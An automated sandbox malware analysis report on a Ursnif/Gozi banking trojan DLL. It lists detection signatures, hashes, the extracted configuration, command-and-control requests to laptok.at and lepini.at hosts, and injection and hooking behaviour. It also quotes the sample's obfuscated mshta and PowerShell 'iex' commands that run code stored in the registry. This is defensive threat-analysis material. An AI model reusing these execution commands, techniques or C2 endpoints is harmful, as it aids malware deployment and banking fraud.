Analysis Report SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.19261 (renamed file extension from 19261 to dll)
Analysis ID: 351337
MD5: 4e62d8a29ba5805407ece642d63df461
SHA1: 320f45735c2da0a93359d00ae8d714b48f9c5531
SHA256: ded0afec1ce538699df52daf0e024a3b2965fd0520e9ff4d5a8ed4c141967fb9
Tags: Gozi

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: http://c56.lepini.at/jvassets/xI/t64.dat Avira URL Cloud: Label: phishing
Found malware configuration
Source: loaddll32.exe.6720.1.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250171", "uptime": "217", "system": "b81731599bd7bb2de2d9647341cc92e4hh", "size": "201281", "crc": "2", "action": "00000000", "id": "1100", "time": "1612998941", "user": "d095a5848695dc15e71ab15c7c3f3fe3", "hash": "0x4a63e4e6", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at Virustotal: Detection: 8%
Source: api3.lepini.at Virustotal: Detection: 10%

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: c:\oxygenCondition\AlwaysIron\whoseReceive\Chargejoin\senthelp\Go.pdb source: loaddll32.exe, 00000001.00000002.638145001.000000006D936000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\jomxz5kw\jomxz5kw.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdb source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qidcr3ig\qidcr3ig.pdbXP source: powershell.exe, 00000027.00000002.565926797.000001E05F926000.00000004.00000001.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D921B50 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW, 1_2_6D921B50

Networking:

Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: GOOGLEUS
Source: global traffic HTTP traffic detected: GET /api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lknlxGzswe1f42DY/0ZRJKHiwVKqzREh7F1zZfC/xDcrm70JTSUqg/KfoZXHqy/gtcnRpNm54H7DKUH3incyf7/pb15dMsyWG/BetCueYOwQDaUpKex/cvRYM5W54J_2/F_2BvDZYdxx/C0N9hknbzclgNA/1DbqE0vpldFICv5iJdPAy/ml70ZyZiOpRDJ78b/h5qzpBVY36LCiZe/ZMZBhSfYbmpSZEV5ew/ylnSPhfpP/ctfktke6drAYijwp6R_2/Bn8ddXU HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S8BQMDt78kCRWVvFKTW/T3z7jl77vtn31nAs/fsEjsZ1w6_2BM0e/_2B_2BAVLSWZlML2mx/fdFEX0w2l/0RPfFIvYjfZTYoK47bE8/B49X4mtNiudogIoMpOJ/IxyYMxMKBO_2F3ZR_2BAor/8kAylO6X_2Fiq/EdNEwQOa/FYHDMjDZgQLZqSkWO3yLWuc/j3i_2F5QMC/DRHsxypVX90thJgYh/6MpfO8pdNUGy/KOAPjs479Yf/dCe7rPiQO_2FVf/cp_2BP6SlyfefKqn_2BbT/iqLzQdVK/s HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG77Zbx14Y4xpnJSaU_/2BLefveYrx/RefMzSY5Upyfbovm3/qmR0BBGI5hNv/ThDaqb_2FWx/xtufh9Msga_2BR/n0Re_2F1kn8UjgqbyTzQA/dUEEQb_2FY20zF3P/aP2AGWgGjayZp9N/yWUTgNMTKZ6EUJxA4O/ga_2BAyhH/6Y4krin4Qd0F9dpWa_2B/Ch_2FWBvvOfaFtGBtaq/0_2BX8pwR_2BJW2aCmXSlR/nA3h5ZuemZjTY/QscPrV_2/FMUurtz9meWYyTWZTPSvYNG/TWbWCTxFm9i/RC HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/QPXSdTpsTN/HmJ5aoUnf9rdkbxHL/55q96h_2FAWR/k9PcTeP3anx/njZx9Znect4yPc/mgdKs7g4jsgOtOBfxx1F8/dzjzqrTWiA9S1bt6/AAS87muT_2BSLDv/WQXbadF0d6swuwTHJY/KpV8Mcid0/fHtmjyLYo7_2F_2FC9mX/FlMafGrpg0QISkwj5AA/Bx9kwrN4mx4ScQVnt0eLjW/cqdTbOZIYSnXb/FOL19o_2/BXbibnK12KkZbqaHWamy8is/edmHREWEDn/WS6dZgPXk2heo8Q98/fno8e4WQ55cB/UHS6HXS3QGn/yz08vW6xSGc_2B/3HnBpBPOsyIhF/0kjBdKE HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/y_2FMOeWpuzZk/_2BnXUq3/JVsuHPZPWAuyAx51lbHW1TL/IXSkSA4WVL/DAqpD_2FBMpJwncEg/rZCSM_2By6jC/ilwbgSYz7wD/mcGv71FzhjZLjk/T5o_2Bi_2BnHa_2FHus_2/FtPTy54kQsAO5_2F/YmY57BYO_2F3DGr/PGRRj0Jrbr_2FcDWwI/cfiYP4Yvr/dFVw_2BRaTzNAlHYP_2B/F4QkcLzCJs_2FLyJ_2B/cMYZQA7iSlD9E2ry5mxVYa/rzbbsgjyGZ2a_/2Fo1e83a/dC9sn5XgEM_2FJ7rr6KTfxU/jopGSNBS_2/BO60ALGRt2Y_2Bxa9/6M_2Bh2kKvyG/E_2FWuogkAX/tPVHUrOPK7/MSerDY8wu/3 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Host: api3.lepini.at
Source: unknown DNS traffic detected: queries for: api10.laptok.at
Source: unknown HTTP traffic detected: POST /api1/6znaROjfA7hFvImt7kRBj/d8oBlDeaiTpDTw3m/IBQAbTPMeELrV0F/eBc8XtKIPlaG2wOk3_/2FzWsO07N/QVPbwJwjwuG0x_2Bmgtb/T2QshS_2F9rl28gdKaK/ObX5241N6Yuhqoe_2Bb_2F/v7SApCdjSpVoH/vIUqUnsJ/WVeez27cvHmK85aDLttDAUk/ChK5ibvdbq/6hwDFc02b_2F096iz/u_2BBs0hOK08/GFHq_2B8sNe/xc8KOXJRGK_2BT/23ua6L_2BsKd5NwAEGyWZ/BrR5nO2eoCoLivkJ/HCF96ydzEoPKQbD/PpBNddo_2FoZtXcrSVB6/q HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0Content-Length: 2Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 10 Feb 2021 14:15:41 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: {E1BA15B4-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr String found in binary or memory: http://api10.laptok.at/api1/1Pg3i0gSwH/_2BK37nF8HXWhrouM/t7ZtEKshXTnV/JlSrHeYCtLF/7DzeevtXCQ9YRw/K2S
Source: {E1BA15B2-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr String found in binary or memory: http://api10.laptok.at/api1/AOpX_2BLE_2B_2B/x33_2BOxagWAsMnrX_/2B_2BU6zh/wlNMMjJfhf4dJdxy0gqf/YX9lkn
Source: loaddll32.exe, 00000001.00000002.630147501.00000000019D0000.00000002.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/i
Source: {E1BA15B6-6BF5-11EB-90E6-ECF4BB82F7E0}.dat.32.dr String found in binary or memory: http://api10.laptok.at/api1/fXWtKegXNhimfshJm11/ybi6PbAu_2FzbCxUMkXaR0/07xh_2FjserNk/Akz7MnFa/ilUyiG
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000027.00000002.530089766.000001E05BF71000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000027.00000002.531049628.000001E05C17E000.00000004.00000001.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000027.00000002.575396484.000001E06BFD5000.00000004.00000001.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: loaddll32.exe, 00000001.00000002.638274435.000000006D969000.00000002.00020000.sdmp, SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll String found in binary or memory: https://toldsend.com4

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.466452806.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466569570.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.476403108.0000000003C0B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466493019.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466366881.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466524516.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466612626.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466599382.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.466417450.0000000003D88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7048, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6720, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E1C22 GetProcAddress,NtCreateSection,memset, 1_2_6D8E1C22
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E1252 GetLastError,NtClose, 1_2_6D8E1252
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E1AD1 NtMapViewOfSection, 1_2_6D8E1AD1
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E23C5 NtQueryVirtualMemory, 1_2_6D8E23C5
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E21A4 1_2_6D8E21A4
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8FF610 1_2_6D8FF610
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D92BA90 1_2_6D92BA90
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Binary or memory string: OriginalFilenameGo.dllH& vs SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Yara signature match
Source: 00000027.00000003.519858248.000001E074880000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: classification engine Classification label: mal100.troj.evad.winDLL@18/24@11/1
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E1BA15B0-6BF5-11EB-90E6-ECF4BB82F7E0}.dat
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{6E8265A0-F566-D0CB-EF82-F90493D63D78}
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SapiOneCoreServerStartingOrConnecting
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user~1\AppData\Local\Temp\~DF051F935A0216EDA8.TMP
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll'
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put
Source: unknown Process created: C:\Windows\System32\Speech_OneCore\common\SpeechRuntime.exe C:\Windows\System32\Speech_OneCore\Common\SpeechRuntime.exe -Embedding
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Grewrace
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll,Put
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:17420 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7068 CREDAT:82966 /prefetch:2
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.Trojan.Win32.Wacatac.Bml.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E2193 push ecx; ret 1_2_6D8E21A3
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8E2140 push ecx; ret 1_2_6D8E2149
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D8FD3F0 push ecx; mov dword ptr [esp], ecx 1_2_6D8FD3F1
Source: C:\Windows\System32\loaddll32.exe Code function: 1_2_6D954477 pushad ; retf 1_2_6D95451E

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: WININET.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFFAC2D5200
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFFAC2D521C
Modifies the prolog of user mode functions (user mode inline hooks)
